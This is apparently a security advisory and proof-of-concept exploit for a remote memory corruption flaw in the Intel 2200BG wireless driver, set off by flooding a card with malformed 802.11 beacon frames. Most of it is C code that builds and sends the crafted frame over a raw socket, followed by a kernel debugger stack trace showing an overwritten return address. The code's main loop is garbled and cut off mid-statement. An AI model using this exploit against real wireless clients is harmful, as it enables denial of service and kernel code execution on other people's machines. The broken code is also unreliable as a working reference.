Title: Intel 2200BG 802.11 Beacon frame Kernel Memory Corruption Description: The intel wireless mini-pci driver provided with Intel 2200BG cards is vulnerable to a remote race condition memory corruption flaw. Malformed beacons frame can be used to corrupt internal kernel structures,leading to arbitrary code execution. This vulnerability is triggered when flooding wifi card with many malformed beacons frame. The data is copied over internal kernel structures, resulting in memory operations being performed on attacker-controlled pointer values, like EIP values. This vulnerability was found at Intel 2200 driver version 9.0.3.9(09/12/2005). Driver files: w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725 w29mlres.dll 35afeccc4092b69f62d757c4707c74e9 w29NCPA.dll 980f58b157baedc23026dd9302406bdd Author: Breno Silva Pinto (Open Communications Security / bsilva[at]sekure[dot]org) - Initial discovery and PoC Johnny Cache - help doing a working exploit Proof Of Concept: #include #include #include #include #include #include #include #include #include #include #include #include #include #include // Change BSSID and SRC MAC ADDR to AP you are associated char beacon[] = { 0x80, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x18, 0x39, 0xe2, 0x12, 0xda,0x00, 0x18, 0x39, 0xe2, 0x12, 0xda, 0x30, 0x2f, 0x84, 0x18, 0xa9, 0xf7, 0x00, 0x00, 0x00, 0x00, 0x64, 0x00, 0x01, 0x04, 0x00, 0xff, 0x53, 0x41, 0x55, 0x4e, 0x41, 0x01, 0x08, 0x82, 0x84, 0x8b,0x96, 0x24, 0x30, 0x48, 0x6c, 0x04, 0x01, 0x08, 0x05, 0x04, 0x00, 0x01, 0x00, 0x00, 0x2a, 0x01,0x04, 0x2f, 0x01, 0x04, 0x32, 0x04, 0x0c, 0x12, 0x18, 0x60, 0xdd, 0x06, 0x00, 0x10, 0x18, 0x02,0x00, 0xf4, 0x08, 0xc1, 0xca, 0x93 }; int main() { struct sockaddr_ll link; struct ifreq iface; int s, i, randd = 0x22, j, m, a, b; unsigned long len = 0, c = 0; char s_1[700+sizeof(beacon)]; if((s=socket(PF_INET, SOCK_DGRAM, 0))<0) return 0; bzero(&iface,sizeof(iface)); bzero(&link,sizeof(link)); bzero(s_1,sizeof(beacon)); strcpy(iface.ifr_name,"ath0raw"); if(ioctl(s,SIOCGIFHWADDR, &iface)) { return 0; } if(ioctl(s,SIOCGIFINDEX, &iface)) { return -1; } if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) { return -1; } link.sll_family = AF_PACKET; link.sll_ifindex = iface.ifr_ifindex; if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) { return -1; } memcpy(s_1,beacon,sizeof(beacon)); randd = 0x44; for(i=0;i<33;i++) s_1[37+i] = 0x44; for(;;) { i = 147; for(j=0;j kv ChildEBP RetAddr Args to Child f7a92e68 f6806422 badb0d00 ffffffd2 00000000 nt!KiTrap0E+0x233 (FPO: [0,0] TrapFrame @ f7a92e68) WARNING: Stack unwind information not available. Following frames may be wrong. f7a92f24 5b5a5958 00000378 ffffffd2 015dcf64 w29n51+0x4e422 f7a92f4c f67f56b5 8659feb0 01010077 00000000 0x5b5a5958 f7a92f64 f67f2f09 8659f000 f7a92f94 f67de759 w29n51+0x3d6b5 f7a92f70 f67de759 8659f000 4001000d 4001000d w29n51+0x3af09 f7a92f94 f67cf873 86dc8568 86dc6888 00000000 w29n51+0x26759 f7a92fa8 f67b938c 86dc6888 86bd1000 f7a92fd0 w29n51+0x17873 f7a92fb8 f74aaf09 86bd1000 448a47c0 00000001 w29n51+0x138c f7a92fd0 804dbbd4 86dc8580 86dc856c 00000000 NDIS!ndisMDpcX+0x21 (FPO: [Non-Fpo]) f7a92ff4 804db89e f1751d54 00000000 00000000 nt!KiRetireDpcList+0x46 (FPO: [0,0,0]) f7a92ff8 f1751d54 00000000 00000000 00000000 nt!KiDispatchInterrupt+0x2a (FPO: [Uses EBP] [0,0,1]) 804db89e 00000000 00000009 bb835675 00000128 0xf1751d54 Return address was overwrote with 0x5b5a5958.